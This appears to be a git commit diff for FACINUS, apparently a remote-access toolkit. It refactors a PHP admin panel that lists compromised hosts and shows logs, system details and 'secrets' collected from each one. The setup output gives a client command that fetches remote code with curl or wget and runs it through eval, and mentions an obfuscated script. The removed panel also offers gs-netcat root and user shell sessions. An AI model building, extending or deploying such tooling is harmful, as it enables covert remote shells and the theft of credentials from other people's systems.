refactor handling web logs && fix issues

This commit is contained in:
2025-04-09 02:59:29 +03:00
parent e84043539f
commit 43ebdd8b19
9 changed files with 645 additions and 939 deletions

View File

@@ -49,7 +49,7 @@ Obfuscated script created.
Deployment server setup complete!
==============================================================
Server URL: http://192.168.0.131/deployment
Admin Page: http://192.168.0.131/deployment/admin.php
Admin Page: http://192.168.0.131/deployment/admin/admin.php
Admin Password: 2cn2lguMIdx9
Client Setup Command: eval "$(curl -fsSL http://192.168.0.104/deployment/y)"
==============================================================

View File

@@ -47,7 +47,7 @@ echo "==============================================================
Deployment server setup complete!
==============================================================
Server URL: http://$SERVER_IP/deployment
Admin Page: http://$SERVER_IP/deployment/admin.php
Admin Page: http://$SERVER_IP/deployment/admin/admin.php
Admin Password: $ADMIN_PASSWORD
Client Setup Command: eval \"\$(wget -qO- http://$SERVER_IP/deployment/y)\"
==============================================================

View File

@@ -1,907 +0,0 @@
<?php
// FACINUS Admin Panel
// This file allows viewing logs and connection information from deployed clients
// Session and authentication
session_start();
$admin_password = "ADMIN_PASSWORD_PLACEHOLDER"; // Will be replaced during installation
// Handle login
if (isset($_POST['password'])) {
if ($_POST['password'] === $admin_password) {
$_SESSION['authenticated'] = true;
} else {
$login_error = "Invalid password";
}
}
// Handle logout
if (isset($_GET['logout'])) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Check authentication
$authenticated = isset($_SESSION['authenticated']) && $_SESSION['authenticated'] === true;
// Directories
$logs_dir = __DIR__ . "/logs";
$secrets_dir = __DIR__ . "/secrets";
// Get list of hosts (each subdirectory in logs_dir is a host)
$hosts = [];
if ($authenticated && is_dir($logs_dir)) {
$dir_content = scandir($logs_dir);
foreach ($dir_content as $item) {
if ($item != "." && $item != ".." && is_dir($logs_dir . "/" . $item)) {
$hosts[] = $item;
}
}
}
// View specific log if requested
$current_log = null;
$log_content = "";
if ($authenticated && isset($_GET['log'])) {
$log_path = $logs_dir . "/" . $_GET['host'] . "/" . $_GET['log'];
if (file_exists($log_path) && is_file($log_path)) {
$current_log = $_GET['log'];
$log_content = file_get_contents($log_path);
}
}
// View system info if requested
$system_info = null;
if ($authenticated && isset($_GET['info']) && $_GET['info'] === 'system') {
$info_path = $logs_dir . "/" . $_GET['host'] . "/system_info.json";
if (file_exists($info_path) && is_file($info_path)) {
$system_info = json_decode(file_get_contents($info_path), true);
}
}
// View secrets if requested
$secrets = [];
if ($authenticated && isset($_GET['secrets']) && $_GET['host']) {
$host_secrets_dir = $secrets_dir . "/" . $_GET['host'];
if (is_dir($host_secrets_dir)) {
$secret_files = scandir($host_secrets_dir);
foreach ($secret_files as $file) {
if ($file != "." && $file != ".." && is_file($host_secrets_dir . "/" . $file)) {
$type = pathinfo($file, PATHINFO_FILENAME);
$value = file_get_contents($host_secrets_dir . "/" . $file);
$secrets[$type] = $value;
}
}
}
}
// For gsocket shell access
$shell_mode = false;
if ($authenticated && isset($_GET['shell']) && $_GET['host']) {
$shell_mode = true;
}
// Get logs for a specific host if requested
$host_logs = [];
if ($authenticated && isset($_GET['host'])) {
$host_logs_dir = $logs_dir . "/" . $_GET['host'];
if (is_dir($host_logs_dir)) {
$log_files = scandir($host_logs_dir);
foreach ($log_files as $file) {
if ($file != "." && $file != ".." && is_file($host_logs_dir . "/" . $file)) {
$host_logs[] = $file;
}
}
}
// Sort logs by most recent first
usort($host_logs, function($a, $b) use ($logs_dir) {
return filemtime($logs_dir . "/" . $_GET['host'] . "/" . $b) -
filemtime($logs_dir . "/" . $_GET['host'] . "/" . $a);
});
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>FACINUS - Admin</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<style>
:root {
--bg: #111111;
--text: #33ff33;
--text-dim: #1a991a;
--secondary: #aaaaaa;
--accent: #ff5555;
--border: #333333;
--hover: #222222;
--panel: #191919;
}
* {
box-sizing: border-box;
margin: 0;
padding: 0;
}
body {
font-family: 'Courier New', monospace;
background-color: var(--bg);
color: var(--text);
line-height: 1.5;
}
.container {
width: 95%;
max-width: 1400px;
margin: 0 auto;
padding: 10px;
}
.header {
border-bottom: 1px solid var(--border);
padding: 10px 0;
margin-bottom: 20px;
display: flex;
justify-content: space-between;
align-items: center;
}
pre {
font-family: 'Courier New', monospace;
overflow-x: auto;
white-space: pre;
}
.ascii-header {
font-size: 12px;
line-height: 1.2;
}
.logout {
color: var(--text);
text-decoration: none;
border: 1px solid var(--border);
padding: 5px 10px;
}
.logout:hover {
background: var(--hover);
}
.dashboard {
display: flex;
gap: 20px;
}
.sidebar {
width: 280px;
flex-shrink: 0;
}
.content {
flex-grow: 1;
}
.panel {
border: 1px solid var(--border);
background: var(--panel);
margin-bottom: 20px;
}
.panel-header {
border-bottom: 1px solid var(--border);
padding: 10px;
display: flex;
justify-content: space-between;
align-items: center;
}
.host-list, .log-list {
list-style: none;
}
.host-list a, .log-list a, .tab {
display: block;
padding: 8px 10px;
color: var(--secondary);
text-decoration: none;
border-bottom: 1px solid var(--border);
}
.host-list a:hover, .log-list a:hover, .tab:hover {
background: var(--hover);
color: var(--text);
}
.host-list a.active, .log-list a.active, .tab.active {
color: var(--text);
background: rgba(51, 255, 51, 0.1);
}
.tabs {
display: flex;
border-bottom: 1px solid var(--border);
}
.tab {
padding: 8px 15px;
border-right: 1px solid var(--border);
border-bottom: none;
}
.logs {
padding: 10px;
max-height: 600px;
overflow: auto;
white-space: pre-wrap;
font-family: 'Courier New', monospace;
font-size: 14px;
background: rgba(0, 0, 0, 0.2);
}
.log-date {
float: right;
color: var(--text-dim);
font-size: 0.9em;
}
.login {
max-width: 400px;
margin: 50px auto;
padding: 20px;
border: 1px solid var(--border);
background: var(--panel);
}
input[type="password"] {
width: 100%;
padding: 8px;
margin: 10px 0;
background: var(--bg);
border: 1px solid var(--border);
color: var(--text);
font-family: 'Courier New', monospace;
}
button, .button {
padding: 8px 15px;
background: transparent;
color: var(--text);
border: 1px solid var(--text);
cursor: pointer;
font-family: 'Courier New', monospace;
width: 100%;
}
button:hover, .button:hover {
background: rgba(51, 255, 51, 0.1);
}
.welcome {
text-align: center;
padding: 50px 20px;
color: var(--secondary);
}
.secrets {
padding: 10px;
max-width: 800px;
margin: 0 auto;/
}
.secret {
margin-bottom: 15px;
padding: 8px;
border: 1px solid var(--border);
background: rgba(255, 255, 0, 0.05);
border-radius: 3px;
}
.secret-title {
margin-bottom: 8px;
border-bottom: 1px dashed var(--border);
padding-bottom: 4px;
font-size: 0.9em;
color: var(--text-dim);
}
.command {
background: rgba(0, 0, 0, 0.3);
border: 1px solid var(--border);
padding: 10px;
margin: 10px 0;
position: relative;
overflow-x: auto;
white-space: pre;
font-family: 'Courier New', monospace;
}
.secret .command {
margin: 5px 0;
padding: 8px;
font-size: 0.9em;
line-height: 1.4;
}
.copy-btn {
position: absolute;
right: 5px;
top: 5px;
background: transparent;
color: var(--secondary);
border: 1px solid var(--border);
padding: 2px 5px;
cursor: pointer;
font-size: 12px;
width: auto;
font-family: 'Courier New', monospace;
}
.copy-btn:hover {
background: var(--hover);
color: var(--text);
}
.alert {
border-left: 3px solid var(--accent);
padding: 10px;
margin-bottom: 15px;
color: var(--accent);
}
.terminal {
height: 500px;
background: #000;
color: var(--text);
padding: 10px;
overflow: auto;
font-family: 'Courier New', monospace;
margin-top: 10px;
}
.terminal-input {
background: transparent;
border: none;
color: var(--text);
width: 100%;
font-family: 'Courier New', monospace;
outline: none;
padding: 5px 0;
}
.gs-command {
margin: 10px 0;
}
.info-table {
width: 100%;
border-collapse: collapse;
}
.info-table tr {
border-bottom: 1px solid var(--border);
}
.info-table td {
padding: 8px 10px;
}
.info-label {
color: var(--secondary);
width: 150px;
}
@media (max-width: 800px) {
.dashboard {
flex-direction: column;
}
.sidebar {
width: 100%;
}
.ascii-header {
font-size: 10px;
}
.tabs {
flex-wrap: wrap;
}
}
</style>
</head>
<body>
<div class="container">
<div class="header">
<div class="ascii-header">
<pre>
█████▒▄▄▄ ▄████▄ ██▓ ███▄ █ █ ██ ██████
▓██ ▒▒████▄ ▒██▀ ▀█ ▓██▒ ██ ▀█ █ ██ ▓██▒▒██ ▒
▒████ ░▒██ ▀█▄ ▒▓█ ▄ ▒██▒▓██ ▀█ ██▒▓██ ▒██░░ ▓██▄
░▓█▒ ░░██▄▄▄▄██ ▒▓▓▄ ▄██▒░██░▓██▒ ▐▌██▒▓▓█ ░██░ ▒ ██▒
░▒█░ ▓█ ▓██▒▒ ▓███▀ ░░██░▒██░ ▓██░▒▒█████▓ ▒██████▒▒
▒ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░░▓ ░ ▒░ ▒ ▒ ░▒▓▒ ▒ ▒ ▒ ▒▓▒ ▒ ░
░ ▒ ▒▒ ░ ░ ▒ ▒ ░░ ░░ ░ ▒░░░▒░ ░ ░ ░ ░▒ ░ ░
░ ░ ░ ▒ ░ ▒ ░ ░ ░ ░ ░░░ ░ ░ ░ ░ ░
░ ░░ ░ ░ ░ ░ ░
admin panel
</pre>
</div>
<?php if ($authenticated): ?>
<a href="?logout=1" class="logout">logout</a>
<?php endif; ?>
</div>
<?php if (!$authenticated): ?>
<div class="login">
<h2>> login</h2>
<?php if (isset($login_error)): ?>
<div class="alert"><?php echo $login_error; ?></div>
<?php endif; ?>
<form method="post">
<label for="password">password:</label>
<input type="password" id="password" name="password" required autofocus>
<button type="submit">access</button>
</form>
</div>
<?php else: ?>
<div class="dashboard">
<div class="sidebar">
<div class="panel">
<div class="panel-header">
<h3>> hosts</h3>
</div>
<?php if (count($hosts) > 0): ?>
<ul class="host-list">
<?php foreach ($hosts as $host): ?>
<li>
<a href="?host=<?php echo urlencode($host); ?>" class="<?php echo isset($_GET['host']) && $_GET['host'] === $host ? 'active' : ''; ?>">
<?php echo htmlspecialchars($host); ?>
</a>
</li>
<?php endforeach; ?>
</ul>
<?php else: ?>
<div class="welcome">
<p>no connected hosts</p>
</div>
<?php endif; ?>
</div>
</div>
<div class="content">
<?php if (isset($_GET['host'])): ?>
<div class="panel">
<div class="panel-header">
<h2>> <?php echo htmlspecialchars($_GET['host']); ?></h2>
</div>
<div class="tabs">
<a href="?host=<?php echo urlencode($_GET['host']); ?>" class="tab <?php echo !isset($_GET['info']) && !isset($_GET['secrets']) && !isset($_GET['shell']) ? 'active' : ''; ?>">
logs
</a>
<a href="?host=<?php echo urlencode($_GET['host']); ?>&info=system" class="tab <?php echo isset($_GET['info']) && $_GET['info'] === 'system' ? 'active' : ''; ?>">
system
</a>
<a href="?host=<?php echo urlencode($_GET['host']); ?>&secrets=1" class="tab <?php echo isset($_GET['secrets']) ? 'active' : ''; ?>">
secrets
</a>
<a href="?host=<?php echo urlencode($_GET['host']); ?>&shell=1" class="tab <?php echo isset($_GET['shell']) ? 'active' : ''; ?>">
shell
</a>
</div>
<?php if (isset($_GET['shell'])): ?>
<div style="padding: 10px;">
<h3>> gsocket shell access</h3>
<?php
// Check for gsocket user and root secret files
$user_secret = "";
$root_secret = "";
if (isset($secrets['gsocket_user'])) {
$user_secret = $secrets['gsocket_user'];
}
if (isset($secrets['gsocket_root'])) {
$root_secret = $secrets['gsocket_root'];
}
?>
<?php if (!empty($user_secret) || !empty($root_secret)): ?>
<?php if (!empty($user_secret)): ?>
<div class="gs-command">
<p>> user session</p>
<div class="command">
gs-netcat -s <?php echo htmlspecialchars($user_secret); ?> -i
<button class="copy-btn" onclick="copyToClipboard(this)" data-clipboard="gs-netcat -s <?php echo htmlspecialchars($user_secret); ?> -i">
copy
</button>
</div>
</div>
<?php endif; ?>
<?php if (!empty($root_secret)): ?>
<div class="gs-command">
<p>> root session</p>
<div class="command">
gs-netcat -s <?php echo htmlspecialchars($root_secret); ?> -i
<button class="copy-btn" onclick="copyToClipboard(this)" data-clipboard="gs-netcat -s <?php echo htmlspecialchars($root_secret); ?> -i">
copy
</button>
</div>
</div>
<?php endif; ?>
<div class="terminal" id="terminal">
<p>$ terminal emulation (run gs-netcat commands above in your local terminal)</p>
<p>$ this web console serves as a visual example only</p>
<p>$ -------------------------------------------------------</p>
<div id="output"></div>
<div style="display: flex;">
<span>$</span>
<input type="text" class="terminal-input" id="terminalInput" autocomplete="off">
</div>
</div>
<?php else: ?>
<div class="welcome">
<p>no gsocket secrets collected from this host</p>
</div>
<?php endif; ?>
</div>
<?php elseif (isset($_GET['secrets'])): ?>
<div class="secrets">
<?php if (count($secrets) > 0): ?>
<?php foreach ($secrets as $type => $value): ?>
<div class="secret">
<div class="secret-title">
> <?php echo htmlspecialchars(str_replace('_', ' ', $type)); ?>
</div>
<div class="command">
<?php echo htmlspecialchars($value); ?>
<button class="copy-btn" onclick="copyToClipboard(this)" data-clipboard="<?php echo htmlspecialchars($value); ?>">
copy
</button>
</div>
</div>
<?php endforeach; ?>
<?php else: ?>
<div class="welcome">
<p>no secrets collected from this host</p>
</div>
<?php endif; ?>
</div>
<?php elseif (isset($_GET['info']) && $_GET['info'] === 'system'): ?>
<div style="padding: 10px;">
<?php if ($system_info): ?>
<table class="info-table">
<?php foreach ($system_info as $key => $value): ?>
<tr>
<td class="info-label"><?php echo htmlspecialchars(str_replace('_', ' ', $key)); ?></td>
<td><?php echo htmlspecialchars($value); ?></td>
</tr>
<?php endforeach; ?>
</table>
<?php else: ?>
<div class="welcome">
<p>no system information collected</p>
</div>
<?php endif; ?>
</div>
<?php else: ?>
<?php if ($current_log): ?>
<div class="logs">
<?php echo htmlspecialchars($log_content); ?>
</div>
<?php elseif (count($host_logs) > 0): ?>
<ul class="log-list">
<?php foreach ($host_logs as $log): ?>
<?php
$log_time = filemtime($logs_dir . "/" . $_GET['host'] . "/" . $log);
$log_date = date("Y-m-d H:i:s", $log_time);
?>
<li>
<a href="?host=<?php echo urlencode($_GET['host']); ?>&log=<?php echo urlencode($log); ?>">
<?php echo htmlspecialchars($log); ?>
<span class="log-date"><?php echo $log_date; ?></span>
</a>
</li>
<?php endforeach; ?>
</ul>
<?php else: ?>
<div class="welcome">
<p>no logs available</p>
</div>
<?php endif; ?>
<?php endif; ?>
</div>
<?php else: ?>
<div class="welcome">
<p>select a host to view details</p>
</div>
<?php endif; ?>
</div>
</div>
<?php endif; ?>
</div>
<script>
function copyToClipboard(element) {
const text = element.getAttribute('data-clipboard');
navigator.clipboard.writeText(text).then(function() {
const originalText = element.innerText;
element.innerText = "copied!";
setTimeout(() => {
element.innerText = originalText;
}, 1000);
});
}
// Simple terminal simulation
const terminalInput = document.getElementById('terminalInput');
const output = document.getElementById('output');
let commandHistory = [];
let commandIndex = -1;
if (terminalInput) {
terminalInput.addEventListener('keydown', function(e) {
const terminal = document.getElementById('terminal');
if (e.key === 'Enter') {
e.preventDefault();
const command = terminalInput.value;
if (command.trim() !== '') {
// Add command to history
commandHistory.push(command);
commandIndex = commandHistory.length;
// Display command
const cmdElement = document.createElement('p');
cmdElement.innerHTML = `$ ${command}`;
output.appendChild(cmdElement);
// Simulate response (this is just a simulation)
let response;
if (command.toLowerCase().includes('ls')) {
response = "index.html\nconfig.php\nassets/\n.hidden/";
} else if (command.toLowerCase().includes('whoami')) {
response = "www-data";
} else if (command.toLowerCase().includes('pwd')) {
response = "/var/www/html";
} else if (command.toLowerCase().includes('help')) {
response = "This is a simulated terminal. Use the gs-netcat command in your real terminal for actual access.";
} else {
response = `Command not found: ${command}`;
}
const resElement = document.createElement('p');
resElement.textContent = response;
output.appendChild(resElement);
// Clear input
terminalInput.value = '';
// Scroll to bottom
terminal.scrollTop = terminal.scrollHeight;
}
} else if (e.key === 'ArrowUp') {
// Navigate command history
if (commandHistory.length > 0 && commandIndex > 0) {
commandIndex--;
terminalInput.value = commandHistory[commandIndex];
// Move cursor to end
setTimeout(() => {
terminalInput.selectionStart = terminalInput.value.length;
terminalInput.selectionEnd = terminalInput.value.length;
}, 0);
}
e.preventDefault();
} else if (e.key === 'ArrowDown') {
// Navigate command history
if (commandIndex < commandHistory.length - 1) {
commandIndex++;
terminalInput.value = commandHistory[commandIndex];
} else if (commandIndex >= commandHistory.length - 1) {
commandIndex = commandHistory.length;
terminalInput.value = '';
}
e.preventDefault();
} else if (e.key === 'Tab') {
// Simple tab completion (just a demo)
e.preventDefault();
const cmd = terminalInput.value;
if (cmd.startsWith('cd ')) {
terminalInput.value = 'cd /var/www/';
} else if (cmd.startsWith('cat ')) {
terminalInput.value = 'cat /etc/passwd';
}
}
});
// Focus terminal input when terminal is clicked
const terminal = document.getElementById('terminal');
if (terminal) {
terminal.addEventListener('click', function() {
terminalInput.focus();
});
}
}
// Auto-refresh functionality for logs
const logContent = document.querySelector('.logs');
if (logContent) {
// Add refresh button
const refreshButton = document.createElement('button');
refreshButton.innerText = 'refresh';
refreshButton.className = 'copy-btn';
refreshButton.style.position = 'absolute';
refreshButton.style.top = '10px';
refreshButton.style.right = '10px';
const panelHeader = document.querySelector('.panel-header');
if (panelHeader) {
panelHeader.style.position = 'relative';
panelHeader.appendChild(refreshButton);
refreshButton.addEventListener('click', function() {
// Reload the current page
location.reload();
});
}
}
// Live search functionality for hosts and logs
function addSearchBox(containerSelector, itemSelector) {
const container = document.querySelector(containerSelector);
if (!container) return;
const searchBox = document.createElement('input');
searchBox.type = 'text';
searchBox.placeholder = 'search...';
searchBox.style.width = '100%';
searchBox.style.padding = '8px';
searchBox.style.margin = '0';
searchBox.style.background = 'var(--bg)';
searchBox.style.border = '1px solid var(--border)';
searchBox.style.borderWidth = '0 0 1px 0';
searchBox.style.color = 'var(--text)';
searchBox.style.fontFamily = "'Courier New', monospace";
container.parentNode.insertBefore(searchBox, container);
searchBox.addEventListener('input', function() {
const query = this.value.toLowerCase();
const items = document.querySelectorAll(itemSelector);
items.forEach(item => {
const text = item.textContent.toLowerCase();
if (text.includes(query)) {
item.style.display = 'block';
} else {
item.style.display = 'none';
}
});
});
}
// Add search boxes if lists exist
if (document.querySelector('.host-list')) {
addSearchBox('.host-list', '.host-list li a');
}
if (document.querySelector('.log-list')) {
addSearchBox('.log-list', '.log-list li a');
}
// Add a notification system
function createNotification(message, type = 'info') {
const notification = document.createElement('div');
notification.className = 'notification ' + type;
notification.innerHTML = message;
notification.style.position = 'fixed';
notification.style.bottom = '20px';
notification.style.right = '20px';
notification.style.padding = '10px 15px';
notification.style.background = type === 'error' ? 'rgba(255, 85, 85, 0.2)' : 'rgba(51, 255, 51, 0.1)';
notification.style.border = '1px solid ' + (type === 'error' ? 'var(--accent)' : 'var(--text)');
notification.style.color = type === 'error' ? 'var(--accent)' : 'var(--text)';
notification.style.fontFamily = "'Courier New', monospace";
notification.style.zIndex = '1000';
notification.style.maxWidth = '300px';
notification.style.boxShadow = '0 2px 10px rgba(0,0,0,0.2)';
document.body.appendChild(notification);
setTimeout(() => {
notification.style.opacity = '0';
notification.style.transition = 'opacity 0.5s ease';
setTimeout(() => {
document.body.removeChild(notification);
}, 500);
}, 3000);
}
// Example notifications (uncomment to use)
// document.addEventListener('DOMContentLoaded', function() {
// createNotification('Connected to new host: server-backup-01', 'info');
// });
// Add download functionality for logs
if (logContent) {
const downloadButton = document.createElement('button');
downloadButton.innerText = 'download';
downloadButton.className = 'copy-btn';
downloadButton.style.position = 'absolute';
downloadButton.style.top = '10px';
downloadButton.style.right = '80px'; // Position next to refresh button
const panelHeader = document.querySelector('.panel-header');
if (panelHeader) {
panelHeader.appendChild(downloadButton);
downloadButton.addEventListener('click', function() {
const content = logContent.innerText;
const blob = new Blob([content], {type: 'text/plain'});
const url = URL.createObjectURL(blob);
const a = document.createElement('a');
a.href = url;
a.download = '<?php echo isset($_GET["log"]) ? $_GET["log"] : "log"; ?>';
document.body.appendChild(a);
a.click();
document.body.removeChild(a);
URL.revokeObjectURL(url);
createNotification('Log file downloaded successfully', 'info');
});
}
}
// Enable dark mode toggle
const darkModeToggle = document.createElement('button');
darkModeToggle.innerText = 'toggle theme';
darkModeToggle.className = 'copy-btn';
darkModeToggle.style.position = 'absolute';
darkModeToggle.style.top = '10px';
darkModeToggle.style.right = '100px';
darkModeToggle.style.display = 'none'; // Hidden by default, enable if you want this feature
const header = document.querySelector('.header');
if (header) {
header.style.position = 'relative';
header.appendChild(darkModeToggle);
darkModeToggle.addEventListener('click', function() {
const root = document.documentElement;
const currentBg = getComputedStyle(root).getPropertyValue('--bg').trim();
if (currentBg === '#111111') {
// Switch to light mode
root.style.setProperty('--bg', '#f0f0f0');
root.style.setProperty('--text', '#006600');
root.style.setProperty('--text-dim', '#004d00');
root.style.setProperty('--secondary', '#444444');
root.style.setProperty('--border', '#cccccc');
root.style.setProperty('--hover', '#e0e0e0');
root.style.setProperty('--panel', '#ffffff');
} else {
// Switch to dark mode
root.style.setProperty('--bg', '#111111');
root.style.setProperty('--text', '#33ff33');
root.style.setProperty('--text-dim', '#1a991a');
root.style.setProperty('--secondary', '#aaaaaa');
root.style.setProperty('--border', '#333333');
root.style.setProperty('--hover', '#222222');
root.style.setProperty('--panel', '#191919');
}
});
}
</script>
</body>
</html>

275
web/admin/admin.php Normal file
View File

@@ -0,0 +1,275 @@
<?php
// FACINUS Admin Panel
session_start();
$admin_password = "ADMIN_PASSWORD_PLACEHOLDER"; // Will be replaced during installation
// Handle login/logout
if (isset($_POST['password'])) {
if ($_POST['password'] === $admin_password) {
$_SESSION['authenticated'] = true;
} else {
$login_error = "Invalid password";
}
}
if (isset($_GET['logout'])) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Check authentication
$authenticated = isset($_SESSION['authenticated']) && $_SESSION['authenticated'] === true;
// Directories
$logs_dir = __DIR__ . "/logs";
$secrets_dir = __DIR__ . "/secrets";
// Get list of hosts
$hosts = [];
if ($authenticated && is_dir($logs_dir)) {
$dir_content = scandir($logs_dir);
foreach ($dir_content as $item) {
if ($item != "." && $item != ".." && is_dir($logs_dir . "/" . $item)) {
$hosts[] = $item;
}
}
}
// View specific log if requested
$current_log = null;
$log_content = "";
if ($authenticated && isset($_GET['log']) && isset($_GET['host'])) {
// Fix path traversal by sanitizing inputs
$host = basename($_GET['host']);
$log = basename($_GET['log']);
$log_path = $logs_dir . "/" . $host . "/" . $log;
if (file_exists($log_path) && is_file($log_path)) {
$current_log = $log;
$log_content = file_get_contents($log_path);
}
}
// View system info if requested
$system_info = null;
if ($authenticated && isset($_GET['info']) && $_GET['info'] === 'system' && isset($_GET['host'])) {
$host = basename($_GET['host']);
$info_path = $logs_dir . "/" . $host . "/system_info.json";
if (file_exists($info_path) && is_file($info_path)) {
$system_info = json_decode(file_get_contents($info_path), true);
}
}
// View secrets if requested
$secrets = [];
if ($authenticated && isset($_GET['secrets']) && isset($_GET['host'])) {
$host = basename($_GET['host']);
$host_secrets_dir = $secrets_dir . "/" . $host;
if (is_dir($host_secrets_dir)) {
$secret_files = scandir($host_secrets_dir);
foreach ($secret_files as $file) {
if ($file != "." && $file != ".." && is_file($host_secrets_dir . "/" . $file)) {
$type = pathinfo($file, PATHINFO_FILENAME);
$value = file_get_contents($host_secrets_dir . "/" . $file);
$secrets[$type] = $value;
}
}
}
}
$host_logs = [];
if ($authenticated && isset($_GET['host'])) {
$host = basename($_GET['host']);
$host_logs_dir = $logs_dir . "/" . $host;
if (is_dir($host_logs_dir)) {
$log_files = scandir($host_logs_dir);
foreach ($log_files as $file) {
if ($file != "." && $file != ".." && is_file($host_logs_dir . "/" . $file)) {
$host_logs[] = $file;
}
}
// Sort logs by most recent first
usort($host_logs, function($a, $b) use ($host_logs_dir) {
$file_b = $host_logs_dir . "/" . $b;
$file_a = $host_logs_dir . "/" . $a;
$time_b = file_exists($file_b) ? filemtime($file_b) : 0;
$time_a = file_exists($file_a) ? filemtime($file_a) : 0;
return $time_b - $time_a;
});
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>FACINUS - Admin</title>
<link rel="stylesheet" href="styles.css">
</head>
<body>
<div class="container">
<div class="header">
<a href="admin.php" class="logo">
<pre class="ascii-header">
█████▒▄▄▄ ▄████▄ ██▓ ███▄ █ █ ██ ██████
▓██ ▒▒████▄ ▒██▀ ▀█ ▓██▒ ██ ▀█ █ ██ ▓██▒▒██ ▒
▒████ ░▒██ ▀█▄ ▒▓█ ▄ ▒██▒▓██ ▀█ ██▒▓██ ▒██░░ ▓██▄
░▓█▒ ░░██▄▄▄▄██ ▒▓▓▄ ▄██▒░██░▓██▒ ▐▌██▒▓▓█ ░██░ ▒ ██▒
░▒█░ ▓█ ▓██▒▒ ▓███▀ ░░██░▒██░ ▓██░▒▒█████▓ ▒██████▒▒
▒ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░░▓ ░ ▒░ ▒ ▒ ░▒▓▒ ▒ ▒ ▒ ▒▓▒ ▒ ░
░ ▒ ▒▒ ░ ░ ▒ ▒ ░░ ░░ ░ ▒░░░▒░ ░ ░ ░ ░▒ ░ ░
░ ░ ░ ▒ ░ ▒ ░ ░ ░ ░ ░░░ ░ ░ ░ ░ ░
░ ░░ ░ ░ ░ ░ ░
admin panel
</pre>
</a>
<?php if ($authenticated): ?>
<a href="?logout=1" class="logout">logout</a>
<?php endif; ?>
</div>
<?php if (!$authenticated): ?>
<div class="login">
<h2>> login</h2>
<?php if (isset($login_error)): ?>
<div class="alert"><?php echo $login_error; ?></div>
<?php endif; ?>
<form method="post">
<label for="password">password:</label>
<input type="password" id="password" name="password" required autofocus>
<button type="submit">access</button>
</form>
</div>
<?php else: ?>
<div class="dashboard">
<div class="sidebar">
<div class="panel">
<div class="panel-header">
<h3>> hosts</h3>
</div>
<?php if (count($hosts) > 0): ?>
<input type="text" id="hostSearch" placeholder="search..." class="search-box">
<ul class="host-list">
<?php foreach ($hosts as $host): ?>
<li>
<a href="?host=<?php echo urlencode($host); ?>" class="<?php echo isset($_GET['host']) && $_GET['host'] === $host ? 'active' : ''; ?>">
<?php echo htmlspecialchars($host); ?>
</a>
</li>
<?php endforeach; ?>
</ul>
<?php else: ?>
<div class="welcome">
<p>no connected hosts</p>
</div>
<?php endif; ?>
</div>
</div>
<div class="content">
<?php if (isset($_GET['host'])): ?>
<div class="panel">
<div class="panel-header">
<h2>> <?php echo htmlspecialchars(basename($_GET['host'])); ?></h2>
<?php if ($current_log): ?>
<button class="action-btn" id="downloadBtn">download</button>
<button class="action-btn" id="refreshBtn">refresh</button>
<?php endif; ?>
</div>
<div class="tabs">
<a href="?host=<?php echo urlencode(basename($_GET['host'])); ?>" class="tab <?php echo !isset($_GET['info']) && !isset($_GET['secrets']) ? 'active' : ''; ?>">
logs
</a>
<a href="?host=<?php echo urlencode(basename($_GET['host'])); ?>&info=system" class="tab <?php echo isset($_GET['info']) && $_GET['info'] === 'system' ? 'active' : ''; ?>">
system
</a>
<a href="?host=<?php echo urlencode(basename($_GET['host'])); ?>&secrets=1" class="tab <?php echo isset($_GET['secrets']) ? 'active' : ''; ?>">
secrets
</a>
</div>
<?php if (isset($_GET['secrets'])): ?>
<div class="secrets">
<?php if (count($secrets) > 0): ?>
<?php foreach ($secrets as $type => $value): ?>
<div class="secret">
<div class="secret-title">
> <?php echo htmlspecialchars(str_replace('_', ' ', $type)); ?>
</div>
<div class="command">
<?php echo htmlspecialchars($value); ?>
<button class="copy-btn" data-clipboard="<?php echo htmlspecialchars($value); ?>">
copy
</button>
</div>
</div>
<?php endforeach; ?>
<?php else: ?>
<div class="welcome">
<p>no secrets collected from this host</p>
</div>
<?php endif; ?>
</div>
<?php elseif (isset($_GET['info']) && $_GET['info'] === 'system'): ?>
<div class="system-info">
<?php if ($system_info): ?>
<table class="info-table">
<?php foreach ($system_info as $key => $value): ?>
<tr>
<td class="info-label"><?php echo htmlspecialchars(str_replace('_', ' ', $key)); ?></td>
<td><?php echo htmlspecialchars($value); ?></td>
</tr>
<?php endforeach; ?>
</table>
<?php else: ?>
<div class="welcome">
<p>no system information collected</p>
</div>
<?php endif; ?>
</div>
<?php else: ?>
<?php if ($current_log): ?>
<div class="logs">
<?php echo htmlspecialchars($log_content); ?>
</div>
<?php elseif (count($host_logs) > 0): ?>
<input type="text" id="logSearch" placeholder="search..." class="search-box">
<ul class="log-list">
<?php foreach ($host_logs as $log_file): ?>
<?php
$host = basename($_GET['host']);
$log_time = filemtime($logs_dir . "/" . $host . "/" . $log_file);
$log_date = date("Y-m-d H:i:s", $log_time);
?>
<li>
<a href="?host=<?php echo urlencode($host); ?>&log=<?php echo urlencode($log_file); ?>">
<?php echo htmlspecialchars($log_file); ?>
<span class="log-date"><?php echo $log_date; ?></span>
</a>
</li>
<?php endforeach; ?> </ul>
<?php else: ?>
<div class="welcome">
<p>no logs available</p>
</div>
<?php endif; ?>
<?php endif; ?>
</div>
<?php else: ?>
<div class="welcome">
<p>select a host to view details</p>
</div>
<?php endif; ?>
</div>
</div>
<?php endif; ?>
</div>
<script src="scripts.js"></script>
</body>
</html>

63
web/admin/scripts.js Normal file
View File

@@ -0,0 +1,63 @@
// Copy to clipboard functionality
document.addEventListener('click', function(e) {
if (e.target && e.target.classList.contains('copy-btn')) {
const text = e.target.getAttribute('data-clipboard');
navigator.clipboard.writeText(text).then(function() {
const originalText = e.target.innerText;
e.target.innerText = "copied!";
setTimeout(() => {
e.target.innerText = originalText;
}, 1000);
});
}
});
// Search functionality
function setupSearch(inputId, itemsSelector) {
const searchInput = document.getElementById(inputId);
if (searchInput) {
searchInput.addEventListener('input', function() {
const query = this.value.toLowerCase();
const items = document.querySelectorAll(itemsSelector);
items.forEach(item => {
const text = item.textContent.toLowerCase();
